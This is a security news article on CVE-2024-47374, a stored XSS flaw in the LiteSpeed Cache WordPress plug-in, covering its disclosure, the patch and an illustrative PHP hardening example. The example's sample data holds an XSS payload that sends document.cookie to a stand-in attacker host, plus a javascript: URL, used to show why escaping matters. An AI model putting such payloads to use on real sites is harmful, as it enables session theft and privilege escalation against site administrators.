6 Million WordPress Sites at Risk from XSS Vulnerability in LiteSpeed Cache Plug-In

October 7, 2024

A major security flaw has been identified in the LiteSpeed Cache plug-in for WordPress, which is installed on more than 6 million sites. The vulnerability, a cross-site scripting (XSS) flaw, could allow an attacker to inject script or HTML into an affected site, enabling redirects, ads, and other payloads, and, because the injected content runs in the browser of a privileged user, to escalate privileges. The flaw was discovered by a security researcher known as TaiYou, who reported it to Patchstack through its Bug Bounty Program for WordPress.

The vulnerability, tracked as CVE-2024-47374, affects LiteSpeed Cache versions up to and including 6.5.0.2. The plug-in is described as an 'all-in-one site acceleration plugin, featuring an exclusive server-level cache and a collection of optimization features' and is compatible with popular WordPress plug-ins such as WooCommerce, bbPress, and Yoast SEO. Site owners are urged to update immediately.

The flaw is an unauthenticated stored XSS vulnerability: an attacker needs no account to plant the payload, which takes a single HTTP request, and the payload is saved by the plug-in and executed later when a privileged user views the affected page. According to Patchstack, that is what allows any unauthenticated user to steal sensitive information or escalate privileges on the WordPress site. XSS is a common and frequently exploited web vulnerability in which an attacker injects script or markup into a legitimate webpage or application, where it runs with the privileges of whoever views it.

TaiYou discovered three flaws in the plug-in, including another XSS flaw and a path-traversal vulnerability. However, only CVE-2024-47374 is considered dangerous and likely to be exploited by attackers, according to Patchstack. Upon notification, the developers of the LiteSpeed Cache plug-in quickly provided a patch for validation, and LiteSpeed Cache version 6.5.1 was then released with fixes for all three flaws.

CVE-2024-47374 is classified as CWE-79, 'Improper Neutralization of Input During Web Page Generation.' The vulnerability occurs because the code that renders the view of a queue in one part of the plug-in echoes stored values without sanitization or output escaping, so anything an attacker manages to place in that queue is rendered as live HTML when the view is opened. This vulnerability is particularly concerning because of the widespread use of WordPress and its plug-ins, which present a broad attack surface to threat actors.

The patch for CVE-2024-47374 is relatively straightforward: the affected output is escaped with esc_html(), WordPress's HTML-entity escaping function, so stored values are displayed as text rather than interpreted as markup. Patchstack issued a virtual patch to its users to block exploitation attempts until sites have been updated to the fixed version. In the meantime, all administrators of WordPress sites using LiteSpeed Cache are advised to update to version 6.5.1 immediately. Patchstack also recommends that WordPress plug-in developers apply escaping and sanitization to any message that will be displayed as an admin notice, since admin notices are rendered in the browsers of the most privileged users on the site.
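The following is an added example, written for this article and not taken from the LiteSpeed Cache plug-in or from Patchstack, showing the general pattern behind both the queue-view flaw described above and the admin-notice advice: a queue of stored entries rendered straight into the WordPress admin page, beside the same view escaped for the context each value lands in. The queue entry, its field names (`url`, `vary`) and the way the data is assumed to have been stored are constructed for illustration and are not the plug-in's actual data flow. Because the script is meant to run outside WordPress, the WordPress helpers `esc_html()`, `esc_attr()` and `esc_url()` are shimmed with `htmlspecialchars()`-based fallbacks when they are not already defined; inside WordPress the real functions are used.

```php
<?php
// Added example (not LiteSpeed Cache's or Patchstack's code): stored values
// rendered in the WordPress admin without escaping, beside the escaped form.
//
// Assumption: run outside WordPress, so esc_html()/esc_attr()/esc_url() are
// shimmed below. The esc_url() shim is stricter than WordPress's (http/https
// only); it is only here so the script runs stand-alone.

if (!function_exists('esc_html')) {
    function esc_html(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('esc_url')) {
    function esc_url(string $url): string {
        // Shim: reject anything that is not http(s), then escape for an attribute.
        $scheme = parse_url($url, PHP_URL_SCHEME);
        if (!in_array($scheme, ['http', 'https'], true)) {
            return '';
        }
        return esc_attr($url);
    }
}

// Constructed queue entry (hypothetical field names). Imagine an attacker was
// able to get these strings stored; the 'vary' field carries an XSS payload and
// the 'url' field uses a javascript: scheme.
$queue = [
    'abc123' => [
        'url'  => 'javascript:alert(document.cookie)',
        'vary' => '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
    ],
];

// VULNERABLE: stored values are concatenated directly into the admin page, so
// the <img onerror> payload executes in the administrator's browser.
function render_queue_vulnerable(array $queue): string {
    $html = '<ul>';
    foreach ($queue as $key => $v) {
        $html .= '<li>' . $key . ': <a href="' . $v['url'] . '">' . $v['url'] . '</a>'
               . ' [' . $v['vary'] . ']</li>';
    }
    return $html . '</ul>';
}

// HARDENED: each value is escaped for the context it is placed in. Text nodes
// get esc_html(); the href attribute gets esc_url(), which both filters the
// scheme and attribute-escapes the result.
function render_queue_hardened(array $queue): string {
    $html = '<ul>';
    foreach ($queue as $key => $v) {
        $html .= '<li>' . esc_html($key) . ': <a href="' . esc_url($v['url']) . '">'
               . esc_html($v['url']) . '</a> [' . esc_html($v['vary']) . ']</li>';
    }
    return $html . '</ul>';
}

// Admin notices built from stored or request-derived text get the same
// treatment: the message is escaped and the CSS class is restricted to a
// fixed allow-list instead of being taken from input.
function admin_notice_hardened(string $message, string $type = 'info'): string {
    $allowed = ['info', 'success', 'warning', 'error'];
    $class   = in_array($type, $allowed, true) ? $type : 'info';
    return '<div class="notice notice-' . esc_attr($class) . '"><p>'
         . esc_html($message) . '</p></div>';
}

echo "Vulnerable:\n" . render_queue_vulnerable($queue) . "\n\n";
echo "Hardened:\n" . render_queue_hardened($queue) . "\n\n";
echo "Notice:\n" . admin_notice_hardened('Item <script>alert(1)</script> failed', 'error') . "\n";
```

Run with `php example.php` and compare the two outputs: the vulnerable render emits the `<img ... onerror=...>` and `javascript:` URL verbatim, while the hardened render turns the payload into inert entity-encoded text and drops the unsafe href entirely. The point worth carrying over to real plug-in code is that escaping is chosen per output context (`esc_html()` for text, `esc_attr()` for attributes, `esc_url()` for links), and that it belongs at the point of output, which is exactly where the 6.5.1 patch adds `esc_html()`.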
